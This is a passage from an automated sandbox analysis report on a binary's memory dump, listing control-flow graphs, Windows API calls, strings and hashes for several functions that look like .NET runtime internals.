1321 1089660-108966a call fcfd40 1314->1321 1318 1089648-108964f 1315->1318 1319 1089651-1089657 1315->1319 1318->1321 1319->1321 1321->1296
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoUninitialize.OLE32(7CAB6A82,?,?,?,?,?,?,?,00000000,014C8A45,000000FF,?,010891FA), ref: 0108940A
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 010894A0
                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000,?,?,?,?,?,?,?,00000000,014C8A45,000000FF,?,010891FA), ref: 010894F4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentInitializeThreadUninitialize
                                                                                                                                                                                                                          • String ID: MTA$Platform not supported: Windows 7 is the minimum supported version$STA
                                                                                                                                                                                                                          • API String ID: 3738326507-2542953770
                                                                                                                                                                                                                          • Opcode ID: 4a96ad8b5e32b5fc81064cbdc42f3148af6cde9451bd66cb1fc33f5e9357dcc7
                                                                                                                                                                                                                          • Instruction ID: 22c4b70ab84aa888f8865f9cf92f0f02147c1edbd50cdc2116eb4c2e35a53da8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a96ad8b5e32b5fc81064cbdc42f3148af6cde9451bd66cb1fc33f5e9357dcc7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 218125316082049BEB24FF6CD84ABBEB7E5FF80329F10416DE996972D0DB399904CB51
                                                                                                                                                                                                                          Function 01054E10 Relevance: 16.4, APIs: 6, Strings: 3, Instructions: 618COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1324 1054e10-1054e86 call fcff90 call 1052bd0 call fe5090 call 122a500 1333 1054e88-1054e98 call 122a520 1324->1333 1334 1054e9b-1054ebd 1324->1334 1333->1334 1336 1054ed7-1054ee4 call 1052c80 1334->1336 1337 1054ebf-1054ed1 call ffe830 1334->1337 1343 1055247-1055252 1336->1343 1344 1054eea-1054ef5 call 1052d30 1336->1344 1337->1336 1346 1055254-1055260 LeaveCriticalSection 1343->1346 1347 1055299-10552c6 call fcfef0 call 14ab38a 1343->1347 1353 1055330-1055387 call ff1020 call 1047250 call fcc560 1344->1353 1354 1054efb-1054f52 call ff0e50 1344->1354 1350 1055262-1055264 1346->1350 1351 105528f 1346->1351 1355 1055266-1055275 1350->1355 1356 1055282-1055286 1350->1356 1351->1347 1390 10553ce-10553e7 call fcee50 call fcda60 1353->1390 1391 1055389-1055395 LeaveCriticalSection 1353->1391 1367 1054f54-1054f60 LeaveCriticalSection 1354->1367 1368 1054fa9-1054fab 1354->1368 1361 1055277 call 14ab464 1355->1361 1362 105527c 1355->1362 1356->1351 1357 1055288 1356->1357 1357->1351 1361->1362 1362->1356 1372 1054f62-1054f64 1367->1372 1373 1054f9b-1054fa3 1367->1373 1370 1055021-1055027 1368->1370 1371 1054fad-1054fb7 call 108b4c0 1368->1371 1377 10552c7-10552c9 1370->1377 1378 105502d-1055036 1370->1378 1384 10551dc-10551e7 1371->1384 1392 1054fbd-1055017 call ffe830 1371->1392 1379 1054f66-1054f7b 1372->1379 1380 1054f8e-1054f92 1372->1380 1373->1368 1377->1384 1385 10552cf-10552ed call 1047250 call fcee50 call 1014780 1377->1385 1386 105503f-1055048 1378->1386 1387 1055038-105503a call 1054770 1378->1387 1388 1054f7d-1054f82 call 14ab464 1379->1388 1389 1054f88 1379->1389 1380->1373 1382 1054f94 1380->1382 1382->1373 1394 10551e9-10551f0 call fca580 1384->1394 1395 10551fa-1055205 1384->1395 1454 10552ef-10552f9 call 1047250 call 1019ac0 1385->1454 1455 10552fe-105532b call 1047250 call 100fd20 call fcda50 call 14b061b 1385->1455 1398 10550e1-105511a call ffe830 1386->1398 1399 105504e-10550c5 call 1054c00 1386->1399 1387->1386 1388->1389 1389->1380 1441 10553ed-105549f call feb970 call fcd710 call 100df70 call 1047250 call 10ae470 1390->1441 1442 10555e8-10555ee 1390->1442 1401 10553c4 1391->1401 1402 1055397-1055399 1391->1402 1392->1370 1394->1395 1408 1055207-1055209 1395->1408 1409 105521c-105522d call 122a500 1395->1409 1428 105511c-105511e 1398->1428 1429 1055169-105517b call 1058c50 1398->1429 1411 10550ca-10550cc 1399->1411 1401->1390 1413 10553b7-10553bb 1402->1413 1414 105539b-10553aa 1402->1414 1420 1055212 1408->1420 1421 105520b-105520d call ff1050 1408->1421 1409->1343 1434 105522f-1055244 call 122a520 1409->1434 1423 10550d2-10550dc call 101f920 1411->1423 1424 105564f-1055666 call ff1010 call fcec50 call fd1490 1411->1424 1413->1401 1430 10553bd 1413->1430 1426 10553b1 1414->1426 1427 10553ac call 14ab464 1414->1427 1420->1409 1421->1420 1423->1398 1483 1055677-1055688 call fcee50 1424->1483 1484 1055668-1055672 call fcec50 call 10494c0 1424->1484 1426->1413 1427->1426 1428->1429 1437 1055120-1055167 call 1053600 call fc8d00 1428->1437 1448 1055180-105519b LeaveCriticalSection 1429->1448 1430->1401 1434->1343 1437->1448 1515 10554a1-10554c4 call 10473b0 call fc1a30 1441->1515 1516 10554c9-10555bb call fcff80 call fcdae0 call fcdac0 call 1046d80 call fcda80 1441->1516 1450 10555f4-1055619 call 101f920 call fcee50 call 1014780 1442->1450 1448->1384 1457 105519d-105519f 1448->1457 1500 1055628-105564a call 100fd20 call fcda50 call 14b061b 1450->1500 1501 105561b-1055622 call 1019ac0 1450->1501 1454->1455 1455->1353 1464 10551a1-10551b6 1457->1464 1465 10551cf-10551d3 1457->1465 1472 10551c9 1464->1472 1473 10551b8-10551c3 call 14ab464 1464->1473 1465->1384 1476 10551d5 1465->1476 1472->1465 1473->1472 1476->1384 1496 10556a5-105573a call feb970 call fcd710 call 100df70 call fc1a30 1483->1496 1497 105568a-10556a0 1483->1497 1484->1483 1504 105573f-1055875 call fcec50 call fcff80 call fcdae0 call fcdac0 call 1046d80 call fcda80 call 1052d80 call 100fd20 call fecd60 1496->1504 1497->1504 1500->1424 1501->1500 1565 1055877-1055880 1504->1565 1566 10558e3-10558e9 1504->1566 1515->1450 1551 10555d7-10555e6 call fc1a30 1516->1551 1552 10555bd-10555cd call fda010 1516->1552 1551->1450 1552->1551 1560 10555cf-10555d2 call 1047290 1552->1560 1560->1551 1567 1055895-1055899 1565->1567 1568 1055882-1055887 1565->1568 1570 10558a1-10558c5 call 1058c50 call fcbf80 1567->1570 1571 105589b-105589f 1567->1571 1568->1567 1569 1055889-105588d 1568->1569 1569->1566 1572 105588f-1055891 1569->1572 1578 10558c7-10558ca call fc9090 1570->1578 1579 10558cf-10558da call 105ba50 1570->1579 1571->1566 1571->1570 1572->1566 1574 1055893 1572->1574 1574->1571 1578->1579 1579->1566 1583 10558dc-10558de call 1054e10 1579->1583 1583->1566
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C2BDFC,.cctor lock), ref: 01054F55
                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0105578F
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,.cctor lock), ref: 0105518A
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C2BDFC), ref: 01055255
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(03C2BDFC,?,00000003,00000000,0000003C,00000000), ref: 0105538A
                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0105551D
                                                                                                                                                                                                                            • Part of subcall function 00FC1A30: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,00000000,014B34A5,000000FF,?,0122CEBC), ref: 00FC1A73
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DoRunClassInit: Request to init %pT in appdomain %p, xrefs: 01054E8A
                                                                                                                                                                                                                          • .cctor lock, xrefs: 01054EFB
                                                                                                                                                                                                                          • DoRunClassInit: returning SUCCESS for init %pT in appdomain %p, xrefs: 01055236
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Concurrency::details::_Lock::_ReaderScoped_lockScoped_lock::~_Writer$EnterFreeHeap
                                                                                                                                                                                                                          • String ID: .cctor lock$DoRunClassInit: Request to init %pT in appdomain %p$DoRunClassInit: returning SUCCESS for init %pT in appdomain %p
                                                                                                                                                                                                                          • API String ID: 3368655297-1151401383
                                                                                                                                                                                                                          • Opcode ID: 35514c44ea574cd5ec21e35be47ee8f7f7a7b58a849ec1712c19a5d50734c241
                                                                                                                                                                                                                          • Instruction ID: b5f263d402841f34281a5d700a86416894bf5a7a328b6157a581514c201b15dc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35514c44ea574cd5ec21e35be47ee8f7f7a7b58a849ec1712c19a5d50734c241
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF42A2B0A012188FDBA0DF28CD557AEBBF4AF45304F0044EDEA49A7292DB345E84DF95
                                                                                                                                                                                                                          Function 014A8C50 Relevance: 13.6, APIs: 9, Instructions: 148fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1637 14a8c50-14a8c6b 1638 14a8deb-14a8df3 1637->1638 1639 14a8c71-14a8c76 1637->1639 1640 14a8c78-14a8c7f 1639->1640 1641 14a8c99 1639->1641 1643 14a8c93-14a8c95 1640->1643 1644 14a8c81-14a8c8e GetSystemInfo 1640->1644 1642 14a8c9e-14a8ca0 1641->1642 1645 14a8ca2-14a8caf GetSystemInfo 1642->1645 1646 14a8cb4 1642->1646 1647 14a8cb6-14a8cbb 1643->1647 1648 14a8c97 1643->1648 1644->1643 1645->1646 1646->1647 1649 14a8cbd-14a8cc5 1647->1649 1650 14a8ce5 1647->1650 1648->1642 1651 14a8cdf-14a8ce1 1649->1651 1652 14a8cc7-14a8cd9 GetSystemInfo 1649->1652 1653 14a8ceb-14a8ced 1650->1653 1654 14a8d09-14a8d0b 1651->1654 1655 14a8ce3 1651->1655 1652->1651 1656 14a8cef-14a8d01 GetSystemInfo 1653->1656 1657 14a8d07 1653->1657 1654->1638 1658 14a8d11-14a8d13 1654->1658 1655->1653 1656->1657 1657->1654 1659 14a8d2d-14a8d2f 1658->1659 1660 14a8d15-14a8d28 GetSystemInfo 1658->1660 1661 14a8d31-14a8d33 1659->1661 1662 14a8d66-14a8d77 1659->1662 1660->1659 1663 14a8d48-14a8d4a 1661->1663 1664 14a8d35-14a8d42 GetSystemInfo 1661->1664 1665 14a8d79 1662->1665 1666 14a8ddf-14a8de8 1662->1666 1663->1662 1667 14a8d4c-14a8d63 MapViewOfFile 1663->1667 1664->1663 1668 14a8d80-14a8d8f VirtualQuery 1665->1668 1668->1666 1669 14a8d91-14a8d9b 1668->1669 1670 14a8d9d-14a8d9f 1669->1670 1671 14a8dc6-14a8dd5 1669->1671 1672 14a8da1-14a8da3 1670->1672 1673 14a8da5-14a8dbc MapViewOfFileEx 1670->1673 1674 14a8dd8-14a8ddd 1671->1674 1672->1671 1672->1673 1673->1666 1675 14a8dbe-14a8dc4 1673->1675 1674->1666 1674->1668 1675->1674
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8C85
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CA6
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CCB
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8CF3
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D19
                                                                                                                                                                                                                          • GetSystemInfo.KERNEL32(?,00000000,03C71B78,03C05978), ref: 014A8D39
                                                                                                                                                                                                                          • MapViewOfFile.KERNEL32(00000129,00000026,00000000,00000000,00000129,00000000,03C71B78,03C05978), ref: 014A8D57
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(00000001,0122E9F5,0000001C,00000000,03C71B78,03C05978), ref: 014A8D87
                                                                                                                                                                                                                          • MapViewOfFileEx.KERNEL32(00000129,00000026,00000000,00000000,00000129,00000001), ref: 014A8DB1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoSystem$FileView$QueryVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 968504690-0
                                                                                                                                                                                                                          • Opcode ID: 3490dcf743d0c2e9d5cd4295e84c6a974f375285f8781def2138ae49421dbd5b
                                                                                                                                                                                                                          • Instruction ID: 032d7af562d98d731f98ec545a52ff7cc2b8297dfed4cf4393299de44c023a8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3490dcf743d0c2e9d5cd4295e84c6a974f375285f8781def2138ae49421dbd5b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E519335A01219AFDB25CFE5EC44AAFB7B4FB68312F56412EE902E3324E3319951CB40
                                                                                                                                                                                                                          Function 010DAA70 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1676 10daa70-10daab9 CreateMemoryResourceNotification call 1215ca0 1679 10daabb-10daacf 1676->1679 1680 10daad1 1676->1680 1681 10daad3-10daaf0 CreateEventW 1679->1681 1680->1681 1682 10dac56-10dac5b call 1219530 1681->1682 1683 10daaf6-10dab10 call 1215ca0 1681->1683 1688 10dab28 1683->1688 1689 10dab12-10dab26 1683->1689 1690 10dab2a-10dab50 CreateEventW 1688->1690 1689->1690 1690->1682 1691 10dab56-10dab70 call 1215ca0 1690->1691 1694 10dab88 1691->1694 1695 10dab72-10dab86 1691->1695 1696 10dab8a-10dabb0 CreateEventW 1694->1696 1695->1696 1696->1682 1697 10dabb6-10dabd1 call 1215ca0 1696->1697 1700 10dabde 1697->1700 1701 10dabd3-10dabdc call 10851e0 1697->1701 1702 10dabe0-10dac21 call 10898d0 call 10865b0 call 10861b0 1700->1702 1701->1702 1711 10dac46-10dac55 1702->1711 1712 10dac23-10dac38 ResumeThread 1702->1712 1712->1711 1713 10dac3a-10dac41 call 10e27c0 1712->1713 1713->1711
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateMemoryResourceNotification.KERNEL32(00000000,7CAB6A82,00000000,?,00000000,014D1C74,000000FF,?,01418B82,?,?,?,?,?,?,00000000), ref: 010DAA96
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 010DAAE8
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 010DAB48
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 010DABA8
                                                                                                                                                                                                                          • ResumeThread.KERNEL32(00000264,00000000,010DA9A0,00000000,.NET Finalizer), ref: 010DAC2F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Create$Event$Heap$AllocateMemoryNotificationProcessResourceResumeThread
                                                                                                                                                                                                                          • String ID: .NET Finalizer$ResumeThread
                                                                                                                                                                                                                          • API String ID: 1015390596-3261778472
                                                                                                                                                                                                                          • Opcode ID: 2f1a5258c63f66d55d4faefc6d0cd70784776f377559b5465e2dc3fb34fbd6cb
                                                                                                                                                                                                                          • Instruction ID: 8df8bef7f0ffa2cff0a81543a7370e08c3cfc8cef79bbe79513e132892dbb34e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f1a5258c63f66d55d4faefc6d0cd70784776f377559b5465e2dc3fb34fbd6cb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D15182B0E50716DBE7309F688D0579ABBE4AB45B20F204B5EE5A1AB2C0E7B49940C785
                                                                                                                                                                                                                          Function 010861B0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1715 10861b0-108622b GetCurrentThread OpenThreadToken 1716 1086239 1715->1716 1717 108622d-1086237 RevertToSelf 1715->1717 1718 108623e-1086264 1716->1718 1717->1718 1719 108626a-1086288 call 1086510 1718->1719 1720 10862f4-10862ff 1718->1720 1727 108628a-1086295 SetThreadToken 1719->1727 1728 10862d3-10862d8 1719->1728 1722 1086301-1086306 1720->1722 1723 1086316-1086329 1720->1723 1725 1086308-1086309 CloseHandle 1722->1725 1726 108630f 1722->1726 1725->1726 1726->1723 1727->1728 1730 1086297-10862a6 call 122a500 1727->1730 1728->1720 1729 10862da-10862f2 SetThreadDescription 1728->1729 1729->1720 1734 10862a8-10862b7 call 122a520 1730->1734 1735 10862ba-10862ce call 14aa361 call 10d4ef0 1730->1735 1734->1735 1735->1728
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 0108621C
                                                                                                                                                                                                                          • OpenThreadToken.ADVAPI32(00000000), ref: 01086223
                                                                                                                                                                                                                          • RevertToSelf.ADVAPI32 ref: 0108622D
                                                                                                                                                                                                                          • SetThreadToken.ADVAPI32(00000000,000000FF,00000000,00000000,00000001), ref: 0108628D
                                                                                                                                                                                                                          • SetThreadDescription.KERNELBASE ref: 010862F2
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 01086309
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • UndoRevert/SetThreadToken failed for hToken = %d, xrefs: 010862A9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Thread$Token$CloseCurrentDescriptionHandleOpenRevertSelf
                                                                                                                                                                                                                          • String ID: UndoRevert/SetThreadToken failed for hToken = %d
                                                                                                                                                                                                                          • API String ID: 1971310446-1701864498
                                                                                                                                                                                                                          • Opcode ID: c0d2bfc8244405a085502eed036a818820a0a987b74b07da22e5baf5bd9673c9
                                                                                                                                                                                                                          • Instruction ID: 0a8b911dc51aa11401b92fbf3ff26ceb46498ede1bdeea3e963b5314704de697
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0d2bfc8244405a085502eed036a818820a0a987b74b07da22e5baf5bd9673c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68418170A04219AFEB20DFA8CC45B9EBBF5FB04714F114269E954F73D1DBB989008BA0
                                                                                                                                                                                                                          Function 00FD2EE0 Relevance: 9.1, APIs: 7, Instructions: 370memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00FD2FB0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD3013
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(01647ED0), ref: 00FD30DE
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(01647ED0), ref: 00FD3163
                                                                                                                                                                                                                            • Part of subcall function 00FFE830: EnterCriticalSection.KERNEL32(00000000,?,00000000,03C176F0,00000000,?,010E27AE,?,01229EF5), ref: 00FFE8B9
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(01647ED0), ref: 00FD3242
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD3333
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FD336B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
